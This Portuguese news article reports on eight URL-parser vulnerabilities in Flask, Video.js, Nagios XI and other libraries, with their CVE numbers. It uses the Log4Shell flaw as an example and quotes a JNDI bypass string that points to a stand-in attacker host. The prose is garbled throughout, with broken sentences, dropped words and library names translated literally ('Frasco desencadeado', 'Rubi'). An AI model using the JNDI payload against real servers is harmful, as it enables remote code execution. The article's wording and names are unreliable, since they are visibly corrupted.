Pesquisadores descobrem falhas em várias bibliotecas populares de analisadores de URL

Inconsistências e ambiguidades estão presentes em 16 bibliotecas de decodificação de URL (Uniform Resource Locator) distintas. Isso leva à remoção da verificação para que o ‘mal’ possa explorá-los. Eles desbloqueiam o o a uma nova gama de ataques de rede. Os pesquisadores detectam oito falhas de segurança em vários módulos de terceiros. Eles têm formatos em C, JavaScript, PHP, Python e Ruby. Vários aplicativos on-line os usam. Esta é a conclusão de uma investigação das empresas de segurança cibernética Claroty e Synk. Analisador de URL, uma coisa complicada de entender!

“A ambiguidade na análise de endereços da Web pode agravar comportamentos inesperados em softwares, por exemplo, aplicativos da Web. Os invasores maliciosos podem manipulá-los para liderar situações de negação de serviço, vazamento de dados ou possivelmente executar ameaças de execução remota de código”, conforme o relatório do pesquisador para o The Hacker News.

Falha do Log4Shell

Como as URLs são um mecanismo crucial para solicitar e reativar recursos — seja localmente ou na Web — as discrepâncias na forma como as bibliotecas de analisadores percebem uma solicitação de URL podem representar um risco substancial para os usuários. Um bom exemplo é a falha vital do Log4Shell na muito popular estrutura de log Log4j. Isso resulta em uma recuperação de JNDI que se integra a um servidor controlado por adversários. Isso implementa código Java arbitrário sempre que uma string suspeita controlada por um invasor é avaliada ou sempre que está sendo registrada por um aplicativo vulnerável.

A Apache Software Foundation (ASF) implementa rapidamente um reparo para resolver a falha. Logo foi descoberto que as mudanças podem ser superadas por uma entrada especificamente projetada na configuração “${jndi:ldap://127.0.0[.]1#.evilhost.com:1389/a}”. Isso permite que as pesquisas JNDI remotas executem o código mais uma vez.

Você também pode ler: Mais pessoas podem ar aplicativos nativos redesenhados do Windows 11

Lista de vulnerabilidades do analisador de URL

A seguir estão essas oito vulnerabilidades. Seus respectivos mantenedores os abordam.

• Pilha SIP de Belledonne (C, CVE-2021-33056)
• Video.js (JavaScript, CVE-2021-23414)
• Nagios XI (PHP, CVE-2021-37352)
• Segurança do frasco (Python, CVE-2021-23385)
• Flask-security-também (Python, CVE-2021-32618)
• Frasco desencadeado (Python, CVE-2021-23393)
• Usuário do Flask (Python, CVE-2021-23401)
• Liquidação (Rubi, CVE-2021-23435)

É importante entender completamente quais analisadores estão participando de todo o processo. Ant as variações entre analisadores. Seja em sua tolerância, como eles lêem diferentes analisadores de URL defeituosos e quais tipos de URLs eles am.